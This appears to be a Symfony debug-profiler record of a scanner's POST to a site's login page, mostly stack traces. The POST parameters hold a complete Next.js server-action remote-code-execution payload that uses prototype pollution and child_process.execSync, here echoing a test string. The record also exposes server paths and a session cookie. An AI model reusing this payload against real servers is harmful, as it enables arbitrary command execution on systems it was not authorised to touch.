https://fxtest.tiga-sys.com/security/login

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 2>&1 | head -c 500 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\Auth\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_route
"app_login"
_route_params
[]
_security_firewall_run
"_security_main"
_stopwatch_token
"ed2278"

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
content-length
"772"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"PHPSESSID=8aacbbd90428ec4cb26db2433701fea7; sf_redirect=%7B%22token%22%3A%2282601a%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CAuth%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fclients%5C%2F03a78d1f94bda7d4a26f92be73c1ad77%5C%2Fsites%5C%2Ffxtest.tiga-sys.com%5C%2Ffx_change%5C%2Fsrc%5C%2FController%5C%2FAuth%5C%2FSecurityController.php%22%2C%22line%22%3A36%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"fxtest.tiga-sys.com"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-forwarded-proto
"https"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Thu, 11 Dec 2025 01:25:31 GMT"
location
"/security/login"
x-debug-token
"7c4cf8"

Cookies

Request Cookies

Key Value
PHPSESSID
"8aacbbd90428ec4cb26db2433701fea7"
sf_redirect
"{"token":"82601a","route":"app_login","method":"POST","controller":{"class":"App\\Controller\\Auth\\SecurityController","method":"login","file":"\/home\/clients\/03a78d1f94bda7d4a26f92be73c1ad77\/sites\/fxtest.tiga-sys.com\/fx_change\/src\/Controller\/Auth\/SecurityController.php","line":36},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session 4

Session Metadata

Key Value
Created
"Thu, 11 Dec 25 02:25:30 +0100"
Last used
"Thu, 11 Dec 25 02:25:30 +0100"
Lifetime
0

Session Attributes

Attribute Value
_security.last_error
Symfony\Component\Security\Core\Exception\InvalidCsrfTokenException {#309
  #message: "Invalid CSRF token."
  #code: 0
  #file: "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
  #line: 51
  -token: null
  trace: {
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php:51 {
      Symfony\Component\Security\Http\EventListener\CsrfProtectionListener->checkPassport(CheckPassportEvent $event): void …
      › if (false === $this->csrfTokenManager->isTokenValid($csrfToken)) {    throw new InvalidCsrfTokenException('Invalid CSRF token.');}
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php:270 {
      Symfony\Component\EventDispatcher\EventDispatcher::Symfony\Component\EventDispatcher\{closure} …
      ›     }    ($closure = \Closure::fromCallable($listener))(...$args);};
      arguments: {
        $event: Symfony\Component\Security\Http\Event\CheckPassportEvent {#321 …}
        ...: {
          "Symfony\Component\Security\Http\Event\CheckPassportEvent"
          Symfony\Component\EventDispatcher\EventDispatcher {#237 …}
        }
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#188 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …11]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:183 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › $event = new CheckPassportEvent($authenticator, $passport);$this->eventDispatcher->dispatch($event);arguments: {
        $event: Symfony\Component\Security\Http\Event\CheckPassportEvent {#321 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:160 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
      arguments: {
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#327 …}
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:140 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
      arguments: {
        $authenticators: [ …1]
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:65 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:49 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event) …
      › try {    $ret = $this->listener->authenticate($event);} catch (LazyResponseException $e) {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event) …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event) …
      › foreach ($listeners as $listener) {    $listener($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:70 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners) …
      › 
      ›     $listener($event);} else {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall.php:92 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        $listeners: Generator {#239 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:111 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#188 …}
        }
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#188 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …11]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:152 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        $eventName: "kernel.request"
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#15 …}
        $eventName: "kernel.request"
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
        $type: 1
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
        $type: 1
        $catch: true
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#50 …}
      }
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.last_username
""

Session Usage

4 Usages
Stateless check enabled
Usage
App\Security\UserAuthenticator:32
[
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/src/Security/UserAuthenticator.php"
    "line" => 32
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 60
    "function" => "authenticate"
    "class" => "App\Security\UserAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 179
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 160
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 65
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 49
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 111
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 152
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage:85
[
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-csrf/TokenStorage/SessionTokenStorage.php"
    "line" => 85
    "function" => "has"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-csrf/CsrfTokenManager.php"
    "line" => 112
    "function" => "hasToken"
    "class" => "Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
    "line" => 50
    "function" => "isTokenValid"
    "class" => "Symfony\Component\Security\Csrf\CsrfTokenManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 270
    "function" => "checkPassport"
    "class" => "Symfony\Component\Security\Http\EventListener\CsrfProtectionListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "Symfony\Component\EventDispatcher\{closure}"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "::"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 183
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 160
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 65
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 49
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 111
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 152
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator:53
[
  [
    "file" => "/home/clients/03a78d1f94bda7d4a26f92be73c1ad77/sites/fxtest.tiga-sys.com/fx_change/vendor/symfony/security-http/Authenticator/AbstractLoginFormAuthenticator.php"
    "line" => 53
    "function" => "set"
